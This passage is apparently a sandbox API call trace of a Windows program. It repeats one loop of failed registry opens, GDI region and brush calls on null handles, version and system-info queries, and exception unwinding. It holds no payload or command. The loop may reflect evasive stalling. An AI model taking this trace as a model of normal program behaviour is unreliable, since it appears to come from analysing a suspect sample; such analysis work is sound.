TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.595] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401cd [0087.595] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401d0 [0087.595] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104082b [0087.595] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104082c [0087.595] CombineRgn (hrgnDst=0x104082b, hrgnSrc1=0x1a0401cd, hrgnSrc2=0x180401d0, iMode=1) returned 1 [0087.595] CombineRgn (hrgnDst=0x104082c, hrgnSrc1=0x1a0401cd, hrgnSrc2=0x180401d0, iMode=4) returned 2 [0087.595] CreateSolidBrush (color=0xff) returned 0x210082a [0087.595] CreateSolidBrush (color=0xff0000) returned 0x110082d [0087.596] DeleteObject (ho=0x110082d) returned 1 [0087.596] DeleteObject (ho=0x180401d0) returned 1 [0087.596] DeleteObject (ho=0x1a0401cd) returned 1 [0087.596] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.596] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.596] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.596] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.596] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.596] BeginPath (hdc=0x0) returned 0 [0087.596] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.596] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.596] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.596] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.596] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.596] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.596] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.596] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.596] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401d0 [0087.596] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401cd [0087.596] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104082e [0087.596] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104082f [0087.596] CombineRgn (hrgnDst=0x104082e, hrgnSrc1=0x190401d0, hrgnSrc2=0x1b0401cd, iMode=1) returned 1 [0087.596] CombineRgn (hrgnDst=0x104082f, hrgnSrc1=0x190401d0, hrgnSrc2=0x1b0401cd, iMode=4) returned 2 [0087.596] CreateSolidBrush (color=0xff) returned 0x210082d [0087.596] CreateSolidBrush (color=0xff0000) returned 0x1100830 [0087.596] DeleteObject (ho=0x1100830) returned 1 [0087.596] DeleteObject (ho=0x1b0401cd) returned 1 [0087.596] DeleteObject (ho=0x190401d0) returned 1 [0087.596] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.596] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.596] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.596] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.596] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.596] BeginPath (hdc=0x0) returned 0 [0087.596] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.597] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.597] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.597] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.597] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.597] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.597] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.597] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.597] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c0401cd [0087.597] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a0401d0 [0087.597] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040831 [0087.597] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040832 [0087.597] CombineRgn (hrgnDst=0x1040831, hrgnSrc1=0x1c0401cd, hrgnSrc2=0x1a0401d0, iMode=1) returned 1 [0087.597] CombineRgn (hrgnDst=0x1040832, hrgnSrc1=0x1c0401cd, hrgnSrc2=0x1a0401d0, iMode=4) returned 2 [0087.597] CreateSolidBrush (color=0xff) returned 0x2100830 [0087.597] CreateSolidBrush (color=0xff0000) returned 0x1100833 [0087.597] DeleteObject (ho=0x1100833) returned 1 [0087.597] DeleteObject (ho=0x1a0401d0) returned 1 [0087.597] DeleteObject (ho=0x1c0401cd) returned 1 [0087.597] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.597] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.597] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.597] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.597] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.597] BeginPath (hdc=0x0) returned 0 [0087.597] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.597] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.597] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.597] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.597] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.597] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.597] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.597] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.597] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b0401d0 [0087.597] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d0401cd [0087.597] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040834 [0087.597] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040835 [0087.598] CombineRgn (hrgnDst=0x1040834, hrgnSrc1=0x1b0401d0, hrgnSrc2=0x1d0401cd, iMode=1) returned 1 [0087.598] CombineRgn (hrgnDst=0x1040835, hrgnSrc1=0x1b0401d0, hrgnSrc2=0x1d0401cd, iMode=4) returned 2 [0087.598] CreateSolidBrush (color=0xff) returned 0x2100833 [0087.598] CreateSolidBrush (color=0xff0000) returned 0x1100836 [0087.598] DeleteObject (ho=0x1100836) returned 1 [0087.598] DeleteObject (ho=0x1d0401cd) returned 1 [0087.598] DeleteObject (ho=0x1b0401d0) returned 1 [0087.598] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.598] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.598] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.598] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.598] BeginPath (hdc=0x0) returned 0 [0087.598] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.598] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.598] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.598] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.598] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.598] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.598] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.598] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e0401cd [0087.598] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c0401d0 [0087.598] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040837 [0087.598] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040838 [0087.598] CombineRgn (hrgnDst=0x1040837, hrgnSrc1=0x1e0401cd, hrgnSrc2=0x1c0401d0, iMode=1) returned 1 [0087.598] CombineRgn (hrgnDst=0x1040838, hrgnSrc1=0x1e0401cd, hrgnSrc2=0x1c0401d0, iMode=4) returned 2 [0087.598] CreateSolidBrush (color=0xff) returned 0x2100836 [0087.598] CreateSolidBrush (color=0xff0000) returned 0x1100839 [0087.598] DeleteObject (ho=0x1100839) returned 1 [0087.598] DeleteObject (ho=0x1c0401d0) returned 1 [0087.598] DeleteObject (ho=0x1e0401cd) returned 1 [0087.598] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.598] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.598] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.598] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.598] BeginPath (hdc=0x0) returned 0 [0087.598] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.598] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.598] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.598] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.599] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.599] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.599] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.599] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.599] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d0401d0 [0087.599] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f0401cd [0087.599] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104083a [0087.599] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104083b [0087.599] CombineRgn (hrgnDst=0x104083a, hrgnSrc1=0x1d0401d0, hrgnSrc2=0x1f0401cd, iMode=1) returned 1 [0087.599] CombineRgn (hrgnDst=0x104083b, hrgnSrc1=0x1d0401d0, hrgnSrc2=0x1f0401cd, iMode=4) returned 2 [0087.599] CreateSolidBrush (color=0xff) returned 0x2100839 [0087.599] CreateSolidBrush (color=0xff0000) returned 0x110083c [0087.599] DeleteObject (ho=0x110083c) returned 1 [0087.599] DeleteObject (ho=0x1f0401cd) returned 1 [0087.599] DeleteObject (ho=0x1d0401d0) returned 1 [0087.599] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.599] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.599] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.599] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.599] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.599] BeginPath (hdc=0x0) returned 0 [0087.599] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.599] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.599] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.599] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.599] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.599] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.599] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.599] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.600] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x200401cd [0087.600] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e0401d0 [0087.600] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104083d [0087.600] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104083e [0087.600] CombineRgn (hrgnDst=0x104083d, hrgnSrc1=0x200401cd, hrgnSrc2=0x1e0401d0, iMode=1) returned 1 [0087.600] CombineRgn (hrgnDst=0x104083e, hrgnSrc1=0x200401cd, hrgnSrc2=0x1e0401d0, iMode=4) returned 2 [0087.600] CreateSolidBrush (color=0xff) returned 0x210083c [0087.600] CreateSolidBrush (color=0xff0000) returned 0x110083f [0087.600] DeleteObject (ho=0x110083f) returned 1 [0087.600] DeleteObject (ho=0x1e0401d0) returned 1 [0087.600] DeleteObject (ho=0x200401cd) returned 1 [0087.600] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.600] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.600] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.600] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.600] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.600] BeginPath (hdc=0x0) returned 0 [0087.600] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.600] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.600] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.600] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.600] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.600] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.600] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.600] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.600] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f0401d0 [0087.600] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x210401cd [0087.600] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040840 [0087.600] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040841 [0087.600] CombineRgn (hrgnDst=0x1040840, hrgnSrc1=0x1f0401d0, hrgnSrc2=0x210401cd, iMode=1) returned 1 [0087.600] CombineRgn (hrgnDst=0x1040841, hrgnSrc1=0x1f0401d0, hrgnSrc2=0x210401cd, iMode=4) returned 2 [0087.600] CreateSolidBrush (color=0xff) returned 0x210083f [0087.600] CreateSolidBrush (color=0xff0000) returned 0x1100842 [0087.600] DeleteObject (ho=0x1100842) returned 1 [0087.600] DeleteObject (ho=0x210401cd) returned 1 [0087.600] DeleteObject (ho=0x1f0401d0) returned 1 [0087.600] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.600] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.600] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.600] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.600] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.600] BeginPath (hdc=0x0) returned 0 [0087.601] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.601] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.601] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.601] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.601] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.601] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.601] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.601] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x220401cd [0087.601] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x200401d0 [0087.601] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040843 [0087.601] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040844 [0087.601] CombineRgn (hrgnDst=0x1040843, hrgnSrc1=0x220401cd, hrgnSrc2=0x200401d0, iMode=1) returned 1 [0087.601] CombineRgn (hrgnDst=0x1040844, hrgnSrc1=0x220401cd, hrgnSrc2=0x200401d0, iMode=4) returned 2 [0087.601] CreateSolidBrush (color=0xff) returned 0x2100842 [0087.601] CreateSolidBrush (color=0xff0000) returned 0x1100845 [0087.601] DeleteObject (ho=0x1100845) returned 1 [0087.601] DeleteObject (ho=0x200401d0) returned 1 [0087.601] DeleteObject (ho=0x220401cd) returned 1 [0087.601] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.601] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.601] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.601] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.601] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.601] BeginPath (hdc=0x0) returned 0 [0087.601] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.601] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.601] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.601] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.601] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.601] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.601] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.601] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x210401d0 [0087.601] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x230401cd [0087.601] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040846 [0087.601] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040847 [0087.602] CombineRgn (hrgnDst=0x1040846, hrgnSrc1=0x210401d0, hrgnSrc2=0x230401cd, iMode=1) returned 1 [0087.602] CombineRgn (hrgnDst=0x1040847, hrgnSrc1=0x210401d0, hrgnSrc2=0x230401cd, iMode=4) returned 2 [0087.602] CreateSolidBrush (color=0xff) returned 0x2100845 [0087.602] CreateSolidBrush (color=0xff0000) returned 0x1100848 [0087.602] DeleteObject (ho=0x1100848) returned 1 [0087.602] DeleteObject (ho=0x230401cd) returned 1 [0087.602] DeleteObject 